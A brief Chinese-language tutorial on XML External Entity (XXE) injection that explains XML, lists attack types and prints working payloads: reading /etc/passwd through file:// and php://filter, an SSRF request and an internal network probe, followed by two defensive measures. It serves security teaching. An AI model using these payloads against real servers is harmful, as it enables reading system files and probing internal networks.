XXE
XXE漏洞又称XML外部实体注入(XML External Entity)
介绍XXE漏洞前先说一下什么是XML
XML语言
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言
xml的特性
1:无行为:xml只负责包装数据,没有编程语言的逻辑和行为能力,传送、接收、解析都由应用程序完成。
2:纯文本:只有文本,没有颜色加粗等文本样式(bat,html,txt文件都是纯文本的)。
3:自定义:标签和属性名均可以自定义。
xml的设计宗旨是传输数据,侧重于描述和存放数据,焦点是数据的内容,常用于作为软件配置文件和传输数据
常见的XML语法结构
XXE漏洞攻击原理
XXE漏洞发生在程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
在某些情况下,攻击者可以利用XXE漏洞执行服务器端请求伪造(SSRF)攻击,从而升级XXE攻击,以破坏底层服务器或其他后端基础结构。
一般遇到XML语言都可以尝试进行XXE注入
XXE漏洞攻击
| XXE 攻击类型 | 描述 |
|---|---|
| 利用 XXE 检索文件 | 定义包含文件内容的外部实体,并在应用程序的响应中返回。 |
| 利用 XXE 执行 SSRF 攻击 | 外部实体基于 URL 到后端系统的定义。 |
| 利用盲XXE外泄数据带外 | 将敏感数据从应用程序服务器传输到攻击者控制的系统。 |
| 利用盲 XXE 通过错误消息检索数据 | 攻击者可以触发包含敏感数据的解析错误消息的位置。 |
XXE:本地文件包含示例
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<root><name>&admin;</name><password>admin</password></root>
XXE:SSRF ( 服务器侧请求伪造 ) 示例
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]>
<foo>&xxe;</foo>
XXE:探测内网地址 示例
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://192.168.0.100:80">]>
<foo>&xxe;</foo>
XXE防御
- 禁止使用外部实体,例如libxml_disable_entity_loader(true)
- 过滤用户提交的XML数据防止出现非法内容